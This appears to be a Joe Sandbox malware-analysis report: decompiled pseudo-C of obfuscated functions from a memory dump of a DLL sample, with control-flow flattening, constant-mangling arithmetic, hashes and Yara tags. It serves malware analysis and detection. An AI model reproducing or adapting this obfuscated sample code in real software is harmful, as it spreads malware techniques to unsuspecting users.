Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: a2e80b4242ac66f73704f8729152cca645345e8154f5cbecbabc3364f1500e16
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: AF6124720183409FC758CFA5D89A82BBFE1FBC5318F505A1DF6D696260C3B5C919CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00872142, Relevance: 6.6, Strings: 5, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00872142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_push("true");
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_pop(_t394);
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E0087E1F8(0x861a20, _v96, __eflags);
							__eflags = E0086738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E0087FECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E0086C5D8(0x44);
							 *0x886220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0x886220; // 0x0
							_t384 = E0086C5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0x886220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0x886220; // 0x0
							E00882B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0x886220; // 0x0
							E00882B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E0086F7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
						}
						_t389 =  *0x886220; // 0x0
						_t403 = _v20;
						_t390 = E00878B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x00872142
0x00872148
0x00872155
0x00872160
0x0087216f
0x00872171
0x00872176
0x0087217d
0x00872185
0x00872193
0x00872196
0x00872198
0x0087219e
0x008721a6
0x008721ae
0x008721bb
0x008721be
0x008721c2
0x008721ca
0x008721d2
0x008721df
0x008721e3
0x008721e8
0x008721ed
0x008721f5
0x00872202
0x00872206
0x0087220e
0x00872213
0x0087221b
0x00872223
0x00872233
0x00872237
0x0087223f
0x00872247
0x0087224f
0x00872257
0x0087225c
0x00872264
0x0087226f
0x0087227a
0x00872285
0x0087228d
0x00872292
0x0087229a
0x008722a5
0x008722b0
0x008722bb
0x008722c7
0x008722cc
0x008722d2
0x008722d7
0x008722df
0x008722ea
0x008722f2
0x008722fd
0x00872305
0x00872311
0x00872314
0x00872318
0x00872320
0x0087232a
0x00872338
0x0087233d
0x00872343
0x0087234b
0x00872353
0x0087235d
0x00872360
0x00872364
0x0087236c
0x00872374
0x0087237c
0x00872384
0x0087238c
0x00872397
0x0087239f
0x008723aa
0x008723b5
0x008723c0
0x008723cb
0x008723d3
0x008723db
0x008723e0
0x008723e8
0x008723f0
0x008723f8
0x00872400
0x00872408
0x00872410
0x00872414
0x0087241c
0x00872429
0x0087242d
0x0087243a
0x0087243e
0x00872446
0x0087244e
0x0087245a
0x0087245d
0x00872461
0x00872469
0x00872471
0x00872479
0x00872481
0x00872489
0x00872499
0x008724a1
0x008724a9
0x008724b1
0x008724b6
0x008724be
0x008724c3
0x008724cb
0x008724d8
0x008724dc
0x008724e4
0x008724ec
0x008724f6
0x008724fa
0x00872502
0x0087250a
0x0087251f
0x00872524
0x0087252a
0x0087252f
0x00872537
0x00872543
0x00872548
0x0087254e
0x00872556
0x0087255e
0x00872563
0x00872568
0x00872570
0x00872578
0x00872580
0x00872589
0x0087258e
0x00872594
0x0087259c
0x008725a4
0x008725b1
0x008725b2
0x008725bc
0x008725c0
0x008725c8
0x008725d3
0x008725de
0x008725e9
0x008725f4
0x008725fc
0x00872607
0x00872612
0x0087261d
0x00872628
0x00872628
0x00872628
0x0087262d
0x0087262d
0x00872633
0x00872710
0x00872719
0x00872720
0x00872731
0x0087275d
0x0087276b
0x0087276d
0x00872778
0x0087277d
0x00872780
0x00000000
0x00872780
0x0087263f
0x008726b4
0x008726b5
0x008726b8
0x008726bd
0x008726c5
0x008726df
0x008726e7
0x008726ec
0x008726f2
0x008726f5
0x008726fd
0x008726ff
0x00872702
0x00872705
0x00872708
0x00872628
0x00872628
0x00872628
0x00000000
0x00872628
0x00872628
0x00872643
0x008727b7
0x008727c4
0x008727d7
0x008727e4
0x008727ef
0x008727f8
0x008727f8
0x0087264f
0x008727a6
0x00000000
0x008727ac
0x00872657
0x00000000
0x00000000
0x00872661
0x0087267b
0x00872682
0x00872687
0x0087268e
0x0087269a
0x00872690
0x00872692
0x00872697
0x00872697
0x00000000
0x00872785
0x00872785
0x00872785
0x00000000
0x00872791

Strings

)^^, xrefs: 0087221B
b, xrefs: 008723AA
f, xrefs: 00872160
:*, xrefs: 008723D3
J;, xrefs: 008722DF

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )^^$:*$J;$b$f
API String ID: 0-204930537
Opcode ID: 25b28ce3234a317bc96d7f2712f1b8414aaf1f90dab7df3af0a070d7fc002d76
Instruction ID: 82a763a26e060b2b8f3e41747b8938a768ef43a5e20720493907864eb364fcdf
Opcode Fuzzy Hash: 25b28ce3234a317bc96d7f2712f1b8414aaf1f90dab7df3af0a070d7fc002d76
Instruction Fuzzy Hash: 15F11FB15083809FC368CF29D58AA0BFBE1FBC4758F50891DF1998A261DBB59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00882009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00882009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E0086556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E0087654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E0087E1F8(0x861080, _v1056, __eflags);
							_t320 = E0086DC1B(_v1172);
							_t340 =  *0x886214; // 0x0
							_t321 =  *0x886214; // 0x0
							E008844AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E0087FECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E0087E1F8(0x861000, _v1156, __eflags);
					_t333 =  *0x886214; // 0x0
					_t312 =  *0x886214; // 0x0
					__eflags = _t312 + 0x23c;
					E00882D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E0087FECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x00882009
0x0088200f
0x00882019
0x00882024
0x0088202f
0x00882037
0x0088203f
0x00882044
0x0088204c
0x0088205e
0x00882063
0x00882069
0x0088206e
0x00882073
0x0088207b
0x00882083
0x0088208b
0x00882093
0x008820a0
0x008820a1
0x008820a5
0x008820ad
0x008820b5
0x008820b9
0x008820be
0x008820c6
0x008820ce
0x008820d6
0x008820de
0x008820e6
0x008820ee
0x008820fc
0x00882100
0x00882108
0x00882110
0x00882115
0x0088211a
0x0088211f
0x00882127
0x0088212f
0x00882134
0x0088213c
0x00882144
0x00882149
0x00882151
0x00882159
0x00882161
0x0088216e
0x00882172
0x0088217a
0x00882182
0x0088218a
0x00882192
0x0088219a
0x008821a2
0x008821af
0x008821b3
0x008821bb
0x008821c3
0x008821c8
0x008821d0
0x008821d8
0x008821e0
0x008821e8
0x008821f0
0x008821f8
0x00882200
0x00882208
0x00882215
0x00882220
0x0088222b
0x00882239
0x0088223e
0x00882244
0x0088224c
0x00882254
0x0088225e
0x00882261
0x00882265
0x0088226d
0x00882275
0x0088227d
0x00882282
0x0088228a
0x00882292
0x008822a2
0x008822a6
0x008822ab
0x008822b0
0x008822b8
0x008822c0
0x008822c5
0x008822cd
0x008822d8
0x008822e3
0x008822ee
0x008822f6
0x008822fe
0x00882306
0x00882311
0x0088231c
0x00882327
0x0088232f
0x00882337
0x0088233f
0x0088234c
0x0088234f
0x00882353
0x00882357
0x0088235c
0x00882364
0x00882374
0x00882378
0x00882380
0x00882388
0x00882390
0x00882398
0x008823a0
0x008823ab
0x008823b6
0x008823c1
0x008823cd
0x008823d0
0x008823d4
0x008823dc
0x008823e1
0x008823e9
0x008823f1
0x008823f9
0x00882401
0x00882406
0x0088240e
0x00882416
0x00882423
0x00882427
0x0088242f
0x00882437
0x00882442
0x0088244d
0x00882460
0x00882474
0x00882474
0x0088247e
0x00000000
0x008825e3
0x00882486
0x00882498
0x008824a1
0x008824a5
0x008824b0
0x008824bb
0x008824c7
0x008824de
0x00882506
0x00882523
0x00882528
0x0088252b
0x00000000
0x0088252b
0x0088248e
0x00000000
0x00000000
0x00882494
0x00882494
0x00882532
0x0088253b
0x0088253f
0x00882547
0x0088254c
0x00882571
0x0088257d
0x00882587
0x008825a7
0x008825ac
0x008825af
0x008825b1
0x008825b1
0x008825b1
0x00000000

Strings

j8, xrefs: 0088224C
Hz, xrefs: 008823E9
-9, xrefs: 008823B6
qUO, xrefs: 008820DE
XGH, xrefs: 00882390

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 64b19667a406128db79afced02b7ac631f9da86ef10495b7576e2c412f27fcfc
Instruction ID: b9472652dcd4873babca1856e77381b233c92b36aa30cb5202c8a319834092e3
Opcode Fuzzy Hash: 64b19667a406128db79afced02b7ac631f9da86ef10495b7576e2c412f27fcfc
Instruction Fuzzy Hash: AFE131714097809FC3A8CF65C98AA4BBBF1FBC4758F508A1CF5E986260D7B58958CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00883EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00883EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
